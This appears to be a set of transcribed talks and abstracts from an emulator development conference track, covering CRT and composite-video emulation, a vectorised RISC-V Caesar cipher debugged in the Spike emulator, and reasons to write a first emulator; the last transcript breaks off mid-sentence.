the timings properly like different computers will have different relative phases line online although in NTSC world it's basically just either doing it correctly or remaining in phases is the main two as long as you're keeping that stuff keeping track of that and then in principle the same back end should work for any machine. Okay, I've actually got a couple of them by the way there's an open GL implementation and there's a metal implementation because Apple says that I must they're slightly different in the details but hopefully equally compatible. Yeah, thanks, I saw another question about how about I don't know how to pronounce it in English but the SAKEM I think. Oh yeah, so that's not actually using as I understand it not actually using quadrature amplitude modulation it's just like alternating which color signal it amplitude modulates per line so the idea there was that a phase doesn't matter then you can't have phase errors and so you would decode that in a in a different way. Okay, thanks. Somebody else asks where can I buy the hardware to record PCM at I don't know Samosper or whatever I don't know what the meaning of MSPS per second. I cannot offer buying recommendations. Okay, somebody answered an oscilloscope apparently. Yeah, yeah, that's obviously for sampling a real video signal from a real device. 
Okay, don't see another question I had a question myself was how would you go about verifying that your results are as correct as can be is it possible to like quantify it in certain ways especially with the for example though the say like physical effects of phosphor gradient decay or whatever else. Yeah, I wish I've been more rigorous about that stuff so let's see so back when I was starting to try to do this was actually more than six years ago so about a decade ago I wrote a basic ZX81 emulator which is a machine in which the programmer is wholly responsible for producing sync and that made me curious about how this all works and that's when I started vaguely trying to collect documentation. I had a few I managed at the time to find some lovely captured samples of real PAL video back then. So at least I was able to start with a comparison between how I was decoding that and the sort of the recommended the provided sample decoding but that was only I was only like you know frame and a half it was a very small amount of data so on the other things it has been somewhat subjective and empirical. I spent a long time I lived in San Francisco for a bit there's a museum there I have temporarily I'm not going to risk a pronunciation it's a name in French it's got a lot of old video game machines I arcade machines I definitely trolled around there taking phone shots close up of the CRT for a while to try to get a sense of that. So it's a bit of a bit in the eye of the holder right? Yeah especially for stuff like the phosphor decay which is a bit subjective and not necessarily completely mathematical. Okay cool thanks let's see I see question apologies if it has already been covered but I only is it approach amenable to artifacts that happen in the CRT? Things like dot crawl certainly so you know dot crawl is just improper separation of luma and chroma and the point is you know you can't really perfectly separate them because of the way they're multiplexed and therefore actually emulating the signal by combining them and then attempting to separate them rather than a more traditional like NTSC filter type approach i.e. emulators that start with a perfect signal and then you know mess it up a bit. Part of the point of actually generating the signal and then attempting to decode the signal is that the real issues that come when you try to decode such a signal do in fact manifest. Okay thanks another new question how does one reverse engineer CRT? I'm unclear if the scope of that question is pretty broad. Perhaps someone can narrow it down a little bit I'll take an aspect question for now. Have you considered having a warping effect to simulate the convex screens of this place? I haven't actually looked into it at all so I'm kind of on the opposite side of the curve compared to a lot of emulators also in this given that I'm generating the actual composite signal I actually try constantly to do a better job of separating it and decoding it rather than you know a worse job I don't want to call warping a worse job warping is just a physical fact of curved screens and yeah I should look into things like that. Okay thank you let's see do you intend to go further in the fast-force simulation in the future for instance CRT's pixels are not perfect dots and can blend with adjacent ones depending on things such as the intensity of the beam. 
I mean I intend to do a lot of things in the future but yeah that's another factor of real CRT's that I am not currently simulating so it's definitely something that I should try to tackle. Okay don't see one yet somebody typing so perhaps we get a question in a second I have one more question but it's also perhaps a bit a little bit broad but I don't know anything about these things like NTC and how it works and it's inner working so a lot of things in your presentation I didn't understand had to look up I wonder if you have like especially with no electronics background would we be a good resource to start learning about like this. Oh yeah no I had no electronics background I had a half a mathematics undergraduate from which I apparently learnt some trig identities I think I started with I think it was the Noon's video guidebook so like some of the old repair manuals for analogue engineers and most of it went straight over my head because I don't know a transistor from a resistor that's a good they have a different number of legs that's the clue but no so yeah that's why I came in it mostly from the mathematical side I think because my physical skills as an engineer are very slight. Okay thanks I know somebody was talking but apparently not a question. Do I know of anyone else who has a question or is there a problem? Let's see. Somebody says there are questions without votes so I'm going to take a quick look. So I guess I'll elaborate more on that last answer since I didn't necessarily answer the question so well. Oh yeah so I started off I managed to find some actual captures of real analogue frames that was a good place to start because I could plot those and get a good conceptual sense of what the signal looks like you know lots of wavy lines and dips. I have no idea what signal I've not just described. Then just trying to break that up and actually getting the code started like you know a lot of emulators authors there's a desire to get your hands dirty and just get something running that constantly fails and then look at where it fails and figure out what's failing and move on from there so you know discerning the syncs first then categorizing the syncs then you've got something of a black and white signal on screen and then you like well how do I turn this into colour and you can make some broad guesses of things like colour phase before you figure out how to lock to the colour burst similarly hard codes and relative intensities and keep moving. Okay thanks I've got another question now. Triniton displays have a different shape of the colour mask in other TVs can this be simulated? Would it happen after the final pass or somewhere between the two passes? Oh definitely actually I had some simulation of the different colour masks very early on and then I think I got rid of it just because of the programming reason but yeah I mean so you know the absolute simplest level actually one of the PNGs might still be in the repository doesn't matter yeah the basic level you get to the point where you're outputting the RGB you can just sample an additional source texture which is the mask map and multiply on through so like one extra sample one extra multiply per output pixel. Okay thanks we'll take a look again if I see some more questions which we're not sure what did they think we got from. I think especially as monitors go you know much higher pixel density there's a lot of new options for things like you know convincing colour mask simulation. 
Yes, I'm waiting on somebody else to start thinking again. Not that good in smart talk. Probably should have made the presentation longer. On our next steps you're going to take with this project in the near future. So I mean the actual substance of the project ends up being another yet another multi-machine emulator so the specific thing I'm working on right now is another additional machine it's the Apple 2GS right now which I don't know whether that was a wise choice because there's really only one set of documentation which is the official documentation and like most official documentation it's frequently ambiguous or incomplete and sadly the machine wasn't popular enough to get a lot of third party documentation and I don't have access to a real one so yeah this is like how we used to have to write emulators in the 1990s but hopefully after that's done I don't know I've been kind of working my way up so it was only like a 6502 emulator back in 2015 when I started. I gained the Z80, I gained the 68000 and there's all been attempts to do actual without trying to foreshadow the other presentation I'm giving today cycle perfect emulations of those processors but I've been looking more recently at stuff like you know platforms that are defined in terms of an instruction set rather than an actual concrete processor in which case the bus timings are just not an aspect of the way the platform is defined so I have another emulator which does CPM on, it's still called CPM for OS10 because it's pretty old now, I don't know CPM for Mac OS, doesn't even sound good but yeah that's another one of those platforms of course where you know there is a processor in there but the specifics of it are beside the point it's just supposed to be an instruction set in a binary interface. I don't know some of those which are completely disjoint of course from NTSC. Now they still sound very interesting and perhaps that's a nice like a hot to the question like which is that somebody finds this a really interesting obsession I don't know if we've got an obsession but what's the top of it? Oh I don't know, like I was writing so let's think about this it was for an airplane ride inevitably as these things often are sitting in the airport, SFO, trying to wait to, let's think about it. 
Oh so at the time I was a mobile developer doing iOS and this was around the time of probably iOS 4, Apple had just finally imported lambdas slash closures into their language which the rest of you will be laughing about and I was like oh I better learn some new syntax I better fire up something and do something so I started writing a half cycle position Z80 emulator based on you know in queuing future bus steps to take as lambdas slash closures slash whatever they're actually called in Objective C and once you've got that you're asking yourself well what can I run against it and that's how I got to the ZX80 slash 81 the first time around and yeah those machines are really interesting they kind of use the processor to generate the video so there will be a display buffer in memory and the processor will jump to it and then the hardware underneath will trick the processor by stealing whatever it fetches and forcing a knob to the actual processor so the processor will think it's just running lots of knobs but actually it's doing all of the video fetching just lovely so all of the graphics data ends up on the bus and there's a bunch of ways the other signals are used to figure out how long the line should be and where the sync should be and stuff like that but so you end up with a fully programmatic generation of video so you know there's the built-in ROM which does a pretty basic character based display and then there's clever people who figured out how to get a full pixel addressable display out of the exact same hardware even though it wasn't even an advertised feature and so you've got coming out of that you know a video signal it's just one dimensional syncs and pixels and the question is how do you decode that accurately especially because people who actually use those machines way back when and I'm not even old enough myself although clearly I'm close how do you decode that and make it look accurate and that's how I started getting onto the PLL slash sync separation side of things it's only a monochrome machine so from there it was a short leap to well how do people add color to this? Super, I saw like in the corner of my questions coming in so just continue I'm lucky enough to have a couple of CRT displays is there anything special I can use these for any experiments maybe that would help and emulate your development? Let's think about this I mean so what has been really useful to me most recently has been like high resolution high frame rate captures of a CRT and I'd better try to ask this in the next minute so yeah you kind of need more specialized equipment for capturing what it looks like because at this point I mean it depends on the age of CRTs how they want to be doing the color decoding.
|
Many emulators offer a CRT filter, an artist's rendition of classic video. This presentation describes emulation of the an entire NTSC or PAL video device, to produce an engineer's rendition — starting from sync discrimination and separation, through PLLs into scan placement and via QAM to extracting colour. In the implementation discussed work is split between CPU and GPU and a range of emulated source machines are demonstrated, including in-phase machines such as the Atari 2600, machines that routinely generate sync errors such as the ZX80, machines that generate a colour signal in software such as the Apple II, and interlaced machines such as the Acorn Electron.
|
10.5446/53650 (DOI)
|
Hello, FOSSTEM. How are you today? I hope everyone is enjoying the presentation so far. My name is Will Hawkins, and I'm here to present today the writing and testing of a parallel Caesar cipher in Risk 5. Before I get started, I just wanted to give you some contact information here on the first slide along with my pronouns. And I also wanted to say that I hope everyone out there watching today is safe and healthy, and the same is true of their family and friends. That's the most important thing right now. After that, I just want to say thank you to all the great organizers of this conference and especially of this particular track who have done such a great job organizing a wonderful list of presentations. I know that I'm enjoying the presentation so far, and I look forward to the ones that are coming after me, as well as some of the discussion that we're going to have today in the next few minutes. So I just wanted to give you a quick outline of what I'm going to talk about today. First I'm going to give you a brief introduction. I'll talk a little bit about Risk 5. I'll talk about what exactly is a Caesar cipher, some different ways that we can implement the Caesar cipher. And then we'll discuss the uniqueness of Risk 5 vector extensions, which are crucial for that Caesar cipher parallel implementation, which is our whole goal here after all. Then finally, and probably of most interest to the group here, I'll talk about Spike, which is an emulator for Risk 5. We'll talk about emulating the application that we wrote, the Caesar cipher implementation. And then we'll talk about debugging, how we do that in Spike. And at the end, I'll take some questions and we'll have a discussion, maybe even some more live coding. So as an introduction, all I'm assuming today is that you have an interest in this topic. That's really the basics. If you have a minimal familiarity with computer architecture, that'll really help. And I also assume that you'll ask questions in the chat or afterwards when you're confused. That'll give me a chance to interact with you and help make the presentation as meaningful as possible. I also expect that this awesome audience will correct me when I am wrong. Notice that I said when, not if. I'm sure that I will say something wrong as we go through this. I also want to say that all code is online and that these slides are shared so that you can follow all the links in here to all the code and the other references that I make. Finally just a quick introduction. I'm a software developer and computer scientist in the United States. I'm a long time free software user and contributor. And I love to learn new things. So that's why I'm here today. To present to you something new that I've learned. So let's talk first about what is risk five. Risk five is an instruction set architecture. Instruction set architecture is an abstract model of a computer. And a concrete implementation of an instruction set architecture is a CPU. The instruction set architecture tells the computer all of the things that it can do. It specifies how everything operates. And crucially it specifies the operations that the programmer can instruct the computer to do. Those instructions, those operations and the way that the programmer tells the CPU how to operate or the computer how to operate is through something called an instruction set. And the instruction set contains a set of instructions. You're all familiar with instruction set architectures. A few examples. The Intel x86 and ARM. 
So risk five instruction set architecture is similar to Intel x86 and ARM. But unlike Intel x86, it has the risk five has a reduced instruction set. The opposite of a reduced instruction set is what x86 is. It's a complex instruction set. And in a complex instruction set, each of the instructions that the computer can take and do is a high level instruction. In other words, you might be able to tell the computer to do something like make me a grilled cheese sandwich. That's a pretty high level instruction that includes a bunch of low level operations that need to be done in order to produce that grilled cheese sandwich. In a risk processor, on the other hand, you would break that complex operation down into a bunch of smaller operations, such as set location to the pantry, walk to the location, set the target to the door, open the door, etc. The idea and the benefit of doing a risk computer versus a SISC computer is that you can optimize each of those low level instructions and you make no assumptions about what the programmer wants to do. So the programmer is free to add as many different operations to compose as many low level operations as they want to come up with arbitrary high level behavior, rather than being confined to the high level behavior that the computer designer thought that the programmer would need. That's the technical difference. The policy difference, I think, is even more important. Unlike ARM and X86, risk five is free and open. That means that if you want to, if you're a computer manufacturer and you want to implement a CPU that is, that follows the risk five instruction set, you don't need to license that from ARM or X86. That's a huge, huge relief and a huge benefit. The work on risk five began in 2010 officially, but the concept of making a risk computer and the lineage of the risk five process of instruction set architecture has its lineages in the 1980s beginning with David Patterson's research at Berkeley. Now that we know what an instruction set architecture is and what risk five is, let's talk a little bit about what the Caesar cipher is. A cipher is just a way to encrypt text and decrypt text. This cipher is named after Julius Caesar famously, who is said to have used it to communicate with his army. The sender and the receiver of encoded messages share a key and that key is a shift distance. The sender encodes a plain text message by shifting each letter forward by this shift difference, by this key. The receiver, commensurately, receives the decoded message and decodes it by shifting each letter backwards by the same shift distance. As an example, if we wanted to encode the message piece to all of our generals in the military, we would shift each letter of that word forward by our shift distance. In this case, we're going to say it's a shift distance of one. So the message that our enemy might intercept is QFBDF. And unless they were smart enough to decode our secret key, which is so amazingly secure here, they would not be able to understand what that is. However, our general in the field would be able to shift each of those letters back by one and decode that message to receive the intended message that we mean to send piece to the enemy. So how do we implement the Caesar cipher? Well, we can do it in one of two ways. The easiest way is to do it sequentially, where we encrypt each letter of the message one at a time. And what I'm showing here is how we would encrypt and encode the message piece. 
The first thing that we do is we assume that each of the letters in the message is actually its ASCII representation. So the P is represented by the number 112, the E by 101, the A by 97, and so on and so forth. Because it's ASCII and we assume ASCII, we know that each of these will fit in an 8-bit spot. So the first thing that we want to do is encode the letter P. How do we do that? Well, we just add our shift distance, which in our example is one, and we get the letter Q represented here by 113. The same is true for the E, the A, the C, and the E. This sequential implementation can be accomplished in a form, in a paradigm called single instruction, single data. Each instruction that we did, each operation where we added one, operated on a single piece of data. In this case, it was the P and the letter 1. So our instruction was the add, and our single piece of data was the P and the letter 1. Now that seems very slow, and perhaps we can do it better. I'd really, since none of the operations depend on the other, I'd really like to be able to perform the entire encoding in parallel. And we can accomplish this using the paradigm single instruction, multiple data. So here's how we accomplish that. We simply say, all of my data is this string piece and the shift key 1 for each of those. So now we have two bits of data, but we have a single instruction, and that instruction is add. As a result, what we get is the message encoded all in one fail swoop. So how do we look at that in terms of the operations that the CPU can perform? Well, let's look at this as two vector operations, where we have a single instruction and multiple data. Our data comes from vector 0 and vector 1. Vector 0 has 1, 2, 3, 4, 5 instructions, and the same with vector 1. What we'll do is we assume that vector 1 contains the key for the message, and that is a 1 in the F, a 1 in the G, a 1 in the H, a 1 in the I, and 1 in the J. And we assume that the up here has our message, P-E-A-C-E. Here I'm just representing A through E so that I can show you conceptually how this works. The single instruction is to add vector 0 to vector 1 and store the result in vector 2. That's a single instruction, a single operation. And the data comes from vector 0 and vector 1. That's our multiple data. The result is that vector 2 is filled with A plus F, B plus G, C plus H, D plus I, E plus J, all in one operation. That makes things significantly faster. Now how is this implemented in a traditional instruction set architecture? Well in a traditional instruction set architecture, there may be a vector system. And let's say that that vector system is called V. That vector system has a series of vector registers that can store data and can store vectors. Let's say that we only have space enough in the vectors for each register in the vector system for each register to be 64 bits wide. But we want to operate as if that's more than one element. So we can break this down into two 32-bit elements inside a single vector. That's a vector with two elements. And let's say that I want to perform some operation on two of those. Well I might do a VAD 32 and a VSUB 32, a VMOL 32, etc. Those are different operations. But I can break this down further. Maybe I want four 16-bit elements in each register. And I want to perform operations on those. I might do a VAD 16, a VSUB 16, etc. Now what happens when I want to add some additional information? And I want to make this so that I can make the registers bigger. Well, that's easy. But is it? 
I want to maintain all the backwards compatibility. So I leave in my instruction set, I leave vector system V. And I simply add a new one. We'll call that vector system X. A vector register is now in vector system X, is now 128 bits. So I want to be able to divide that and perform operations. Well, now I can divide that into two 64-bit elements. I can divide it into four 32-bit elements. Or eight 16-bit elements. And for each one of those, I need a separate set of operations. But as you can tell, that escalated very quickly. Now the programmer has to remember all of these different operations in order to be able to perform their work. On the other hand, risk five is much more flexible. It specifies that a vector register in a vector system is simply n bits wide. And then I can divide that up into however many different elements fit into that by calling the Vset operation one time. In this case, I've called Vset and said that I want as many 64-bit elements in my vector register as possible. Then once I've configured it, all I have to do is call VAD, VSub, VMult, et cetera. It remembers the configuration. Now I can do the same without having to remember any more operations just by setting the vector register, the vector system, to say that each vector register has as many 32-bit elements as possible. So on for 16. And I've not added any other operations. That's more like it. So how do we do this for our risk five implementation? Well, we have our plain text, and we configure the vector. We configure the vector system into eight-bit elements for each vector register. And we have some leftover padding here, in most cases, which is fine. We just won't use it. So we load the plain text into the plain text vector. We load the key into the key vector. Then we encrypt, which is an add operation. We just add the t and the 1. We get u, e in the 1. We get an f, s in the 1. We get a t. The t in the 1. We get a u. Then we store that ciphertext back to memory. Now, let's see how that looks in practice. I've got here my code that I've downloaded from the internet. And you can see all those are all available on GitHub. And I've started by building this code using build Caesar.sh. And now I can simply execute run Caesar. And it asks me to enter a string to encode. I enter piece. And away we go. Piece encrypts to QFBDF. Pretty simple, right? Awesome. Now, what you may wonder is how I got an entire computer running on risk 5 and how I was able to do that demonstration. Well, actually, I wasn't. What I was doing was using an emulator. And if you're in this dev room, I'm assuming you're all familiar with the emulator. But why would I use the emulator in this case? Well, number one, it's very easy to test using an emulator. Number two, there's a lack of available risk 5 hardware that runs commodity operating systems. There's plenty of risk 5 hardware out there that are dedicated to very specialized processes. And it is proliferating across the industry. However, they don't all run commodity operating systems, like Linux, which is what I want to run. More importantly, I want to say that it's a lack of available risk 5 hardware to me. I don't have any. There are plenty of options out there. In fact, the Beagle 5 was just announced a few days ago, which is going to be $160 system on a chip that will let you run Linux, which is awesome. Finally, and probably most importantly, is the vector operations that we're using to run to do this Caesar Cypher implementation in parallel are not yet standardized. 
So there can't be any actual implementations out there that perform these. So we need to emulate them. So let's talk about how we built this code from our source code all the way to our executable application. The first thing on our host computer, we run a cross compiler. And we let the risk 5 assembler and cross compiler take our application source code and turn it into an executable. Again, that's on the host computer. Then we fire up Spike, which is our emulator. But Spike can't directly implement, can't directly execute a user application. Why not? Because all it's doing is executing, is emulating hardware. It's not emulating anything else. So what we need is a proxy kernel. And that proxy kernel will get started when the emulator starts, do the initialization of the emulated hardware appropriately, and then pass off control to our Caesar Cypher application, which is the point at which we're able to see that prompt on the screen. So from the perspective, let's dig a little bit deeper here. And let's talk about the proxy kernel. The risk 5 computer has three privilege modes of execution. There's machine mode, supervisor mode, and user mode. And here's how the process boots. The machine starts in machine mode, and it initializes control at the reset point. The first function that the kernel invokes is init-first-heart. And the heart is a hardware thread, and that's the most fundamental thread of execution in a risk 5 CPU. Then it calls bootloader to do the bootloading. Then it relinquishes the machine mode privileges that it has and enters supervisor mode, completes the rest of the bootloader. And finally, it will relinquish supervisor mode privileges and go to user mode, at which point it will start the, it'll call the start application, or call the start function in our application, which in turn calls the main function. And I'm assuming that you're all familiar with a main function in a program. Now, not only can Spike emulate programs and run them, it can also debug a system, which is pretty cool. Spike gives a GDB-like debugging interface with breakpoints that can be either unconditional or conditional. And it will allow for memory inspection. So it's very GDB-like, which is really, really neat. Let's give a quick example of how we would debug our CZR Cypher application if something were wrong. Let's say that I want to stop at the very first instruction that I wrote in my program and march through it one step at a time so that I can see what's going on. I want to stop at the beginning of the main function that I wrote. Well, while there are breakpoints in Spike, they operate a little bit differently than in GDB. In Spike, we cannot define a breakpoint using a symbol. So we can't say break main. We have to say equivalently that we want to break on a memory address. Therefore, in order to set our breakpoint, we have to define the address. We have to find the address of main in memory and set it as the breakpoint. So let's see how that looks. The first thing I'm going to do is I'm going to use obj dump in order to find out where main is, what its address is. So I'm going to say run obj dump, which is a script in the repository. And I'm going to redirect that output to caesar.obj. All right. Now I'm going to open the caesar.obj file. And I'm going to look for the main symbol. Look, it's right there. Amazing. All right. So if you're familiar with obj dump, and even if you're not, this is relatively straightforward to read once you understand what's going on. 
All this is saying that at address 0x10194, there's an add instruction. And that's where main is. So let's open this file up over here so we can follow along. It'll be a little bit small, but that's OK just for reference. So we'll quit this. And now what we're going to do is we're going to execute the command debug caesar, which is going to build and run spike in debug mode so that we get our command line, our debuggable interface, just like we would if we ran the program in GDB. So what you can see here is that you get a list of operations if you run help. And you can figure out what each of those are just by reading the documentation and playing around, which is what I did. So let's set our breakpoint. We'll say until PC, which is until the program counter on core 0, which is our only core, hits the address 0x10194. This instruction means execute the application until it hits address 0x10194. All right, so now we did that. And now let's continue to step through our program and see where we are. If you look over here, we expect to see that the next operation that we run is going to be this add i, where we move the stack pointer down to make room on the stack. And voila, there it is. Core 0 is just executed this add i instruction. I could do that again. And I could do that again. And in fact, if I just hit Enter, it'll do the same operation one more time. And what you'll see is the instructions that are executing over here correspond to the instructions that we have in our compiled code. Pretty darn cool. If there's time in the question and answer and people want to learn more about this, we can explore this a little bit more. So in conclusion, what did we talk about? Well, we talked about risk five and learned a little bit about it. We talked about what the Caesar cipher is. We talked about two different ways to implement the Caesar cipher. We talked about the uniqueness of risk five vector extensions. And we played around with the spike, which is a risk five emulator. We showed how you can emulate the application and debug the application. Again, all code is online. And I encourage you to submit feedback and ask questions. Thank you so much for taking the time to listen to the presentation today. I know that there are so many great presentations here going on in parallel that all of this is so overwhelming and you had a choice to choose my presentation. And I really sincerely appreciate it. Thanks again to all the organizers of the conference and especially of this particular track. I'm looking forward to the question and answers.
|
I will demonstrate how to write a vectorized (parallel) Caesar cipher in RISC-V (in assembler) using the project's emulator. Using the emulator is necessary at this point for such an application because the vectorized extension to the RISC-V ISA is not standardized. I will further demonstrate how the emulator itself is able to emulate the execution of a single user-space application when it is actually designed to emulate an entire system. This will involve a demonstration and explanation of riscv-isa-sim, riscv-pk and their interaction.
|
10.5446/53651 (DOI)
|
Hi everyone and thanks for joining. I'm very excited to be here. My name is Manaiotis and by the end of the talk I hope to get you interested in writing your first emulator. A few words about me. When it comes to science and technology, I enjoy all sorts of tinkering. I like playing around with electronics, building DIY projects and I occasionally build carnival costumes. I enjoy swimming, which is something I try to do every day, all year around. And of course, I also enjoy programming computers and that's why by day I work as a software developer. So on to the main subject. I'll try to present you with good reasons as to why writing your first emulator can be awesome. These will be through arguments which I've cherry picked out of my personal experiences and through my interest in emulators. Hopefully with any potential bias filtered out. I'll be focusing on the why rather than on the how you would go about writing an emulator. For one there are other speakers in this dev room more qualified to talk about the latter and for another I believe that why you would do something in the first place is the most important question to answer. I also find that answering the why question nicely complements and naturally leads to the how you would do something. Some technical knowledge would help in being able to follow this talk. For example, although the list is not necessarily conclusive, people with a good grasp of computer science fundamentals and programming experience should be able to easily follow along. Beyond this any curiosity about the inner workings of a computer, a general interest in retro computing or gaming console history should help you stay awake for the next 20 minutes. So let's get right to it. Let me first explain how this talk came to be. While I have had a very special interest in console emulators for a long time just in case not clear yet, I had always dismissed this fact to be just another one of my quirks and I never tried or never had a reason really to understand why this apparently very specific interest of mine existed in the first place. Then sometime last December I received an email from the FOSDM mailing list calling for papers on emulator development which meant that for the first time I was going to be a dev room dedicated to emulators and needless to say I pretty much flipped out upon realizing this. Of course, while at that moment I knew where I would be spending the better part of my FOSDM Saturday, I didn't plan on giving a talk. And anyway, after cooling down from reading this news, that question in the back of my mind resurfaced. Why? Why do I think emulators are so cool and why won't I stop talking about emulators at every opportunity? At this point I also realized that investigating this could also help answer the question why won't my friends invite me out for drinks anymore, which I thought would be a nice bonus. But joking aside, the more I thought about it, the more I realized that such an answer could also be of interest to other people attending the very same dev room that got me excited in the first place. So I decided to actually look into it, put my findings in a slideshow and here we are. So how did I go about answering the why? Looking into the past, I initially came up with the following. I've apparently always liked computers. 
And also having played my fair share of video games as a kid, I have awesome memories of spending hours looking for the last few gems in Spyro 2 to get to the 100% game completion along with the bragging rights that came with it. And furthermore, I got my first ever PC in the early 2000s and I was after I managed to convince my parents that having a computer was a prerequisite for being able to complete high school. So playing a lot of video games back then, you can imagine that the new world of possibility was before my eyes once I realized that I could also play console games on the same computer. And it so happened that emulators were some of the first programs that I ran on that PC. And by the way, if you get any nostalgia by these screenshots, then I'm happy to inform you that you're in the right FOSDEM dev room. Beyond this, I have always had an itch to understand how stuff works on the inside. I have been taking my toys apart since I was five years old, and I can proudly report that I have not broken all of them in the process. And finally, I'm also fascinated by the stories that can be told about the project. For example, in the context of gaming consoles, there was a Sony Nintendo partnership that fell apart before the original PlayStation took the form that we know today. So during this trip down memory lane, I recalled a particular incident from a few years back after which I decided to have a go at writing a name letter to myself, and it went down like this. During that incident, I had a flashback from my high school years. And I remembered that at the time, I really looked up to the people developing the emulators that I was running on my PC. And exactly because I looked up to them, I wanted to do the same thing that they did. But I couldn't because I didn't know how to program a computer. So I fast forward to the mid 2010s and I get my light bulb moment. I say, wait a minute, now I program computers for a living. So I could and I should have a shot at this. So I then started searching online to get an idea of how I should go about this and eventually decided to put some time aside to write a chip aid interpreter. That was like for many other people, the first glimpse of what it can feel like to be involved with emulator development. I should mention here that the chip aid is a system specification or that of a virtual machine, if you like, rather than actual hardware. It was developed in the 1970s in order to enable the programming of games for the computers of that era. Thus, technically speaking, a chip aid interpreter is not actually emulating any hardware. That being said, it's still a great place to start in this domain, as it does put you in the right track, while also being a simple and well documented system. And you can think of it as a hello world of emulator development. So back then, when I was developing that chip aid interpreter, I remember having a lot of fun doing it and having a general sense of euphoria throughout the experience. And for this talk, I searched around and after a couple of hours of digging my way through files, I actually managed to find the source code. And I compiled it and I run it and I loaded the game and recorded the amazing gameplay footage of the console on the screen. For anyone interested, graphics and input were handled using SDL. As a side note, I also remember showing this off to my friends back then, but they didn't seem to share my level of enthusiasm for whatever reason. 
Anyway, at this point, following the general theme of this journey, I wanted to pinpoint why exactly this was so fun and to present hopefully objective arguments as to why this could also be appealing to other people. Okay, so when creating this slide, I wanted to be absolutely sure that I convey my enthusiasm. So I came up with a metaphor, which I thought could also make me sound sophisticated for my first talk at FOSDEM. And it goes like this, the process of developing an emulator is analogous to that of beating a video game. When you implement the core functionality of the system, such as handling instructions that an emulated processor will need to execute, drawing graphics or handling user input, that's when you're playing the main story mode. This goes nicely with the fact that both the hardware you want to emulate and the software you want to run are effectively frozen in time. Thus, the whole process has a relatively well defined beginning and ending. And you will likely have the system specification available that in this metaphor serves as the rules of the game, by which you'll need to abide if you want to complete it. Then after you complete the main story mode, you can do all sorts of optional side quests through which you could unlock a permanent superpower, for example. In this metaphor, this corresponds to adding extra features to the emulator, which you will do once again inside the sandbox of this metaphorical game, since you will still need to play by its rule to some extent. So, if you've ever switched from playing Pokémon on an emulator to playing on actual Game Boy hardware, you will know how not having a fast forward button can feel like a big down rate. And the same could be said about safe states. When creating a safe state, you are taking a snapshot of the state of the system, meaning the contents of the registered memory, and you save it on disk for later use. So, as you can imagine, whenever you decide to load this state at a later time, you'll be able to continue exactly where you left off. You can compare this to what you'd get when you put a virtual machine to hibernate and then go and put it up afterwards. In a video game, this possibility can be especially useful if you need to pause playing under circumstances that a game doesn't allow you to actually save your progress. Taking it further, you could also implicitly keep a history of these system states while you're playing the game. For example, you might decide to store the system state every half a second and keep the states in a queue that can hold up to 20 of them. This means that at any point, you'll have the last 10 seconds of gameplay, cached, and accessible in half a second steps. So, you might have realized where I'm going with this, this continuous state sampling allows you to easily roll back time in the game, for example, if you need to undo a mistake from a few seconds ago. Of course, the list goes on, but the main takeaway here is that an emulator can have an improved and richer feature set compared to the actual hardware, and it has the potential to beat the game when it comes to performance, which I think is pretty awesome when you consider the fact that you're running a game which wasn't compiled to run natively on the hardware you're using. Beyond the cheesy metaphor that you just had to suffer through, why can I say that it was interesting? 
It was effectively computing them backwards because you're in the situation where you have the software being complete, but the hardware being incomplete, and actually it doesn't even exist when you start. So, what do you do? You build this computer, and since you're building it with software, you have all the tools you need at your disposal. And what is really cool about this computing done backwards thing is that once you are confident that you are emulating all of the system's instructions correctly, which is a milestone that you've likely reached by loading some relatively simple games, you can generally expect other games, even more complex ones, to just work. As a side note, if you do decide to write a cheap interpreter after watching this, I recommend setting aside a game or two that you forget about, and only try loading after you've reached this milestone. You will get an incredible sense of accomplishment from it, assuming of course that you don't get something like this. Furthermore, when learning something new, I find it especially important to do so in a context that matters to me, and one that I can relate to. Otherwise, it can start feeling like a chore. So, someone might want to write a console emulator, as opposed to an emulator for some arbitrary CPU core, because they're into video games in general, or if you're like me because of the nostalgia that you get from revisiting the games of your childhood. And a few more points to wrap up this section. The end result of such a project is pretty self-explanatory, meaning that you get to see a video game come to life. And games are always cool, and most people can relate to them in one way or another. So, given that others can relate to the end result as well, you can feel comfortable or even excited to show it off. It's really unlikely that you'll have to answer the question, so what does it do when you show off your project to your friends in trying to explain why you have gone missing for over a month now? That being said, I'm sorry to say that most likely you will still be asked the question, why did you even bother to do this? But given the fact that you're still watching this talk, I think you should already be able to put a compelling answer together. And finally, as a bonus for a hobby project that enables you to play a video game, you don't even have to write that game. So, moving on. Writing an emulator can be an awesome learning experience. There's obviously a technical aspect to this, as you get to revisit concepts of computer science, like registers and memory and interrupts. And while a lot of people are taught about these concepts in university, in order to just be able to pass an exam, you now get to witness their importance and what role they play on the output of a piece of software that you find relevant, using an awesome tool that you created, which effectively allows you to see what's happening on the inside of a gaming console when it's running a game. In addition, getting close and personal with the inside of a system can get you curious to also learn things outside of this more or less anticipated technical context, meaning to learn about the history of gaming consoles, the people behind them, and interesting stories about their games. I've included two examples here. One is about the awesome hacks that developers of the first Crash Bandicoot came up with in order to reach the level of visual detail that they wanted for the game, as the SDK provided by Sony just wasn't going to cut it. 
And the other is about the port of Resident Evil 2 for the Nintendo 64. The thing that was assigned this project managed to squeeze a game sized well over a gigabyte into just 64 megabytes, which was the maximum that a Nintendo 64 cartridge allowed. Of course, learning about the history of a system is just a nice side effect and not a prerequisite for writing an emulator, but it's still cool nevertheless. The nature of a project such as an emulator will help you appreciate the importance of best practices when developing software. You get to see the direct impact of code efficiency and performance, or at least more so when compared to other types of projects. And being a complex project, your code needs to be maintainable, even if you're the only one working on it. Otherwise, you can be sure you'll find yourself lost when you resume development after even a few days of a break. Now, even if this seems obvious, I'll point it out anyway, debugging a complex project using only pre-death statements won't cut it. If you want to keep your sanity, you will use a debugger and you should anyway be trying to make the most out of it when developing software. Beyond this, debuggers have an important place in the world of emulators and you will likely write one yourself in order to be able to debug and understand the code of the game itself as part of your effort to make your emulator play nice with that game. Furthermore, you'll be reminded about what stuff we might take for granted today, things like high-level languages, libraries and tools that make our lives much easier by abstracting away a lot of the gory details. And even the possibility of being able to update software after it has been released or deployed is something we take for granted. So, when the Gran Turismo 2 was released for the original PlayStation in 1999, the Japanese version of the game actually shipped with a bug that prevented players from reaching 100% completion. And remember that that game could only run off of the disk that it shipped on and thus could not be physically patched in any way. So, Sony had to eventually send replacement these two customers. To state once again the obvious, during this journey you will be using tools consulting with documentation and possibly source code that other people decided to share with the world and the importance of this cannot be overstated. The efforts of communities that share their work for everyone to benefit from have a direct impact on improving our everyday lives, let alone our lives as developers. And when it comes to the emulator development scene, in particular it's because of people like them that not just technical knowledge is 